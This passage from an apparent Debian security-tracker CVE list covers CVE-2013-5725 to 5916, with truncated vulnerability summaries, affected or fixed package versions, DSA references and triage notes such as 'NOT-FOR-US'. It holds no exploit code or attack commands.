plugin for Wordpress CVE-2013-5916 (Cross-site scripting (XSS) vulnerability in falha.php in the Bradesco ...) NOT-FOR-US: WordPress plugin wp-e-commerce CVE-2013-5915 (The RSA-CRT implementation in PolarSSL before 1.2.9 does not properly ...) {DSA-2782-1} - polarssl 1.3.1-1 (bug #725359) NOTE: https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2013-05 CVE-2013-5914 (Buffer overflow in the ssl_read_record function in ssl_tls.c in PolarS ...) {DSA-2782-1} - polarssl 1.2.0-1 (bug #725359) NOTE: https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2013-04 CVE-2013-5913 (Cross-site scripting (XSS) vulnerability in the getRecommSearch functi ...) NOT-FOR-US: OXID eShop CVE-2013-5912 (VhttpdMgr in Thomson Reuters Velocity Analytics Vhayu Analytic Server ...) NOT-FOR-US: Thomson Reuters Velocity Analytics Vhayu Analytic Server CVE-2013-5911 (Cross-site scripting (XSS) vulnerability in devform.php in Tenable Sec ...) NOT-FOR-US: Tenable SecurityCenter CVE-2013-5910 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Emb ...) - openjdk-6 6b30-1.13.1-1 - openjdk-7 7u51-2.4.4-1 CVE-2013-5909 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5908 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2848-1 DSA-2845-1} - mariadb-5.5 5.5.35-1 - mariadb-10.0 (Fixed before initial upload) - mysql-5.5 5.5.35+dfsg-1 - mysql-5.1 - percona-xtradb-cluster-5.5 5.5.37-25.10+dfsg-1 CVE-2013-5907 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; JR ...) - openjdk-6 6b30-1.13.1-1 - openjdk-7 7u51-2.4.4-1 CVE-2013-5906 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 all ...) - openjdk-6 (Installation performed differently for Linux distros) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-5905 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 all ...) - openjdk-6 (Installation performed differently for Linux distros) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-5904 (Unspecified vulnerability in Oracle Java SE 7u45 allows remote attacke ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5903 REJECTED CVE-2013-5902 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5901 (Unspecified vulnerability in the Oracle Identity Manager component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5900 (Unspecified vulnerability in the Oracle Identity Manager component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5899 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5898 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5897 (Unspecified vulnerability in the Oracle Agile Product Lifecycle Manage ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5896 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; Ja ...) - openjdk-6 6b30-1.13.1-1 - openjdk-7 7u51-2.4.4-1 CVE-2013-5895 (Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 all ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5894 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) CVE-2013-5893 (Unspecified vulnerability in Oracle Java SE 7u45 and Java SE Embedded ...) - openjdk-6 (Only affects OpenJDK 7) - openjdk-7 7u51-2.4.4-1 CVE-2013-5892 (Unspecified vulnerability in the Oracle VM VirtualBox component in Ora ...) {DSA-2878-1} - virtualbox-ose (low) - virtualbox 4.3.6-dfsg-1 (low; bug #735410) CVE-2013-5891 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2848-1} - mariadb-5.5 5.5.35-1 - mariadb-10.0 (Fixed before initial upload) - mysql-5.5 5.5.35+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - percona-xtradb-cluster-5.5 5.5.37-25.10+dfsg-1 CVE-2013-5890 (Unspecified vulnerability in the Oracle Payroll component in Oracle E- ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-5889 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5888 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, when runnin ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5887 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5886 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5885 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...) NOT-FOR-US: Oracle Solaris CVE-2013-5884 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; Ja ...) - openjdk-6 6b30-1.13.1-1 - openjdk-7 7u51-2.4.4-1 CVE-2013-5883 (Unspecified vulnerability in Oracle Solaris 8 allows local users to af ...) NOT-FOR-US: Oracle Solaris CVE-2013-5882 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) CVE-2013-5881 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) CVE-2013-5880 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5879 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5878 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Emb ...) - openjdk-6 6b30-1.13.1-1 - openjdk-7 7u51-2.4.4-1 CVE-2013-5877 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5876 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...) NOT-FOR-US: Oracle Solaris CVE-2013-5875 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...) NOT-FOR-US: Oracle Solaris CVE-2013-5874 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-5873 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5872 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...) NOT-FOR-US: Oracle Solaris CVE-2013-5871 (Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Pro ...) NOT-FOR-US: Oracle Supply Chain Products CVE-2013-5870 (Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 all ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5869 (Unspecified vulnerability in the Oracle WebCenter Portal component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5868 (Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Pro ...) NOT-FOR-US: Oracle Supply Chain Products CVE-2013-5867 (Unspecified vulnerability in the Siebel Core - Server Infrastructure c ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-5866 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...) NOT-FOR-US: Solaris CVE-2013-5865 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...) NOT-FOR-US: Solaris CVE-2013-5864 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...) NOT-FOR-US: Solaris CVE-2013-5863 (Unspecified vulnerability in Oracle Solaris 11.1 allows remote attacke ...) NOT-FOR-US: Solaris CVE-2013-5862 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...) NOT-FOR-US: Solaris CVE-2013-5861 (Unspecified vulnerability in Oracle Solaris 11.1 allows remote attacke ...) NOT-FOR-US: Solaris CVE-2013-5860 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) CVE-2013-5859 (Unspecified vulnerability in the Instantis EnterpriseTrack component i ...) NOT-FOR-US: Oracle Primavera Products Suite CVE-2013-5858 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-5857 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-5856 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-5855 (Oracle Mojarra 2.2.x before 2.2.6 and 2.1.x before 2.1.28 does not per ...) - mojarra 2.2.8-1 (low; bug #740586) [squeeze] - mojarra (Minor issue) [wheezy] - mojarra (Minor issue) NOTE: https://java.net/jira/browse/JAVASERVERFACES-3150 NOTE: https://java.net/projects/mojarra/sources/svn/revision/12793 CVE-2013-5854 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5853 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-5852 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5851 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u45-2.4.3-1 CVE-2013-5850 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5849 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5848 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5847 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS eCompensat ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5846 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, and Java ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5845 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...) NOT-FOR-US: Oracle iLearning CVE-2013-5844 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5843 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-5842 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5841 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5840 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5839 (Unspecified vulnerability in Oracle Solaris 10 allows remote attackers ...) NOT-FOR-US: Solaris CVE-2013-5838 (Unspecified vulnerability in Oracle Java SE 7u25 and earlier, and Java ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u45-2.4.3-1 CVE-2013-5837 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...) NOT-FOR-US: Solaris CVE-2013-5836 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5835 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-5834 (Unspecified vulnerability in Oracle Solaris 8 allows local users to af ...) NOT-FOR-US: Oracle Solaris CVE-2013-5833 (Unspecified vulnerability in Oracle Solaris 8 and 9 allows local users ...) NOT-FOR-US: Oracle Solaris CVE-2013-5832 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-5831 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5830 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5829 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5828 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-5827 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-5826 (Unspecified vulnerability in the Oracle Transportation Management comp ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5825 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5824 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5823 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/a7758faab30d CVE-2013-5822 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...) NOT-FOR-US: Oracle iLearning CVE-2013-5821 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11.1 allows ...) NOT-FOR-US: Oracle Solaris CVE-2013-5820 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5819 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5818 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5817 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5816 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Full application server not packaged) CVE-2013-5815 (Unspecified vulnerability in the Oracle Identity Analytics component i ...) NOT-FOR-US: Oracle Fusion Middleware Oracle Identity Analytics CVE-2013-5814 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5813 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5812 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5811 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-5810 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5809 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5808 (Unspecified vulnerability in the Oracle iPlanet Web Proxy Server compo ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5807 (Unspecified vulnerability in Oracle MySQL Server 5.5.x through 5.5.32 ...) {DSA-2818-1} - mysql-5.5 5.5.33 - mariadb-5.5 5.5.35-1 - mariadb-10.0 (Fixed before initial upload) - mysql-5.1 (Only affects Mysql 5.5 and 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-5806 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...) - openjdk-6 (Specific to MacOS X) - openjdk-7 7u45-2.4.3-1 NOTE: openjdk-7 package mentioned this CVE, specifc to Mac OS X? CVE-2013-5805 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...) - openjdk-6 (Specific to MacOS X) - openjdk-7 7u45-2.4.3-1 NOTE: openjdk-7 package mentioned this CVE, specific to MacOS X? CVE-2013-5804 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 (unimportant) - openjdk-7 7u45-2.4.3-1 (unimportant) NOTE: Javadoc comments can contain arbitrary HTML CVE-2013-5803 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/0b84d3b434c2 CVE-2013-5802 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5801 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-5800 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u45-2.4.3-1 CVE-2013-5799 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5798 (Unspecified vulnerability in the Oracle Identity Manager component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5797 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5796 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-5795 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-5794 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5793 (Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier al ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-5792 (Unspecified vulnerability in the Techstack component in Oracle E-Busin ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-5791 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5790 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5789 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5788 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5787 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5786 (Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier al ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-5785 (Unspecified vulnerability in the Oracle Reports Developer component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5784 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5783 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 NOTE: http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/2790e9ace697 CVE-2013-5782 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5781 (Unspecified vulnerability in Oracle PARC Enterprise T4 Servers running ...) NOT-FOR-US: Oracle PARC Enterprise CVE-2013-5780 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5779 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5778 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5777 (Unspecified vulnerability in the Java SE and JavaFX components in Orac ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5776 (Unspecified vulnerability in the Java SE and Java SE Embedded componen ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-5775 (Unspecified vulnerability in the Java SE and JavaFX components in Orac ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-5774 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5773 (Unspecified vulnerability in the Oracle Containers for J2EE component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5772 (Unspecified vulnerability in the Java SE component in Oracle Java SE J ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-5771 (Unspecified vulnerability in the XML Parser component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-5770 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-5769 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-5768 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-5767 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-5766 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-5765 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-5764 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-5763 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-5762 (Unspecified vulnerability in the Oracle Siebel CTMS component in Oracl ...) NOT-FOR-US: Oracle Siebel CVE-2013-5761 (Unspecified vulnerability in the Siebel Core - Server BizLogic Script ...) NOT-FOR-US: Oracle Siebel CVE-2013-5760 (QNAP Photo Station before firmware 4.0.3 build0912 allows remote attac ...) NOT-FOR-US: QNAP firmware CVE-2013-5759 REJECTED CVE-2013-5758 (cgi-bin/cgiServer.exx in Yealink VoIP Phone SIP-T38G allows remote aut ...) NOT-FOR-US: Yealink VoIP Phone CVE-2013-5757 (Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G a ...) NOT-FOR-US: Yealink VoIP Phone CVE-2013-5756 (Directory traversal vulnerability in Yealink VoIP Phone SIP-T38G allow ...) NOT-FOR-US: Yealink VoIP Phone CVE-2013-5755 (config/.htpasswd in Yealink IP Phone SIP-T38G has a hardcoded password ...) NOT-FOR-US: Yealink IP Phone CVE-2013-5754 (The authorization implementation on Dahua DVR appliances accepts a has ...) NOT-FOR-US: Dahua DVR CVE-2013-5753 RESERVED CVE-2013-5752 RESERVED CVE-2013-5751 (Directory traversal vulnerability in SAP NetWeaver 7.x allows remote a ...) NOT-FOR-US: SAP NetWeaver 7.x CVE-2013-5750 (The login form in the FriendsOfSymfony FOSUserBundle bundle before 1.3 ...) NOT-FOR-US: FriendsOfSymfony FOSUserBundle CVE-2013-5749 (Cross-site scripting (XSS) vulnerability in management/prioritize_plan ...) NOT-FOR-US: SimpleRisk CVE-2013-5748 (Cross-site request forgery (CSRF) vulnerability in management/prioriti ...) NOT-FOR-US: SimpleRisk CVE-2013-5747 RESERVED CVE-2013-5746 RESERVED CVE-2013-5744 (Cross-site scripting (XSS) vulnerability in Feng Office 2.3.2-rc and e ...) NOT-FOR-US: Feng Office CVE-2013-5743 (Multiple SQL injection vulnerabilities in Zabbix 1.8.x before 1.8.18rc ...) - zabbix 1:2.0.8+dfsg-2 [squeeze] - zabbix (Not supported in Squeeze LTS) CVE-2013-5742 RESERVED CVE-2013-5741 (Triangle Research International (aka Tri) Nano-10 PLC devices with fir ...) NOT-FOR-US: Triangle Research International Nano-10 PLC CVE-2013-5745 (The vino_server_client_data_pending function in vino-server.c in GNOME ...) - vino 3.10.1-1 (low; bug #724545) [wheezy] - vino (Minor issue) [squeeze] - vino (Minor issue) NOTE: http://seclists.org/fulldisclosure/2013/Sep/105 CVE-2013-5740 (Unspecified vulnerability in the Intel Trusted Execution Technology (T ...) NOT-FOR-US: Intel Trusted Execution Technology CVE-2013-5739 (The default configuration of WordPress before 3.6.1 does not prevent u ...) {DSA-2757-1} - wordpress 3.6.1+dfsg-1 CVE-2013-5738 (The get_allowed_mime_types function in wp-includes/functions.php in Wo ...) {DSA-2757-1} - wordpress 3.6.1+dfsg-1 CVE-2013-5737 RESERVED CVE-2013-5736 RESERVED CVE-2013-5735 RESERVED CVE-2013-5734 RESERVED CVE-2013-5733 RESERVED CVE-2013-5732 RESERVED CVE-2013-5731 RESERVED CVE-2013-5730 (Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link D ...) NOT-FOR-US: D-Link CVE-2013-5729 RESERVED CVE-2013-5728 RESERVED CVE-2013-5727 RESERVED CVE-2013-5726 (Tweetbot 1.3.3 for Mac, and 2.8.5 for iPad and iPhone, does not requir ...) NOT-FOR-US: Tweetbot for iOS and Mac CVE-2013-5725 (The Metaclassy Byword app 2.x before 2.1 for iOS does not require conf ...) 